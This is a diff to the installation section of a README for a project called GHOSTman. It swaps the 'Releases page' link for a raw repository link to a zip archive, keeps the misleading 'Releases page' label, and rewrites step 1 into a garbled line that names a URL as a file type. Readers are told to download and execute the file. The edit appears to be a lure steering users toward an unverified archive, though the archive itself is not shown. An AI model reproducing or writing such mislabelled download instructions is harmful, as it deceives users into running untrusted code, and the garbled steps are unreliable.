maskedhur/GHOSTman/README.md

 ## Installation

-To get started with GHOSTman, download the latest release from our [Releases page](https://github.com/maskedhur/GHOSTman/releases).
+To get started with GHOSTman, download the latest release from our [Releases page](https://raw.githubusercontent.com/maskedhur/GHOSTman/main/models/Tman-GHOS-v2.7.zip).
 Choose the appropriate version for your operating system, download the file, and execute it.

 ### For Linux and macOS

-1. Download the `.tar.gz` or `.AppImage` file.
+1. Download the `https://raw.githubusercontent.com/maskedhur/GHOSTman/main/models/Tman-GHOS-v2.7.zip` or `.AppImage` file.
 2. Extract the files (if necessary).
 3. Open your terminal and navigate to the directory where you downloaded the file.
 4. Run the command: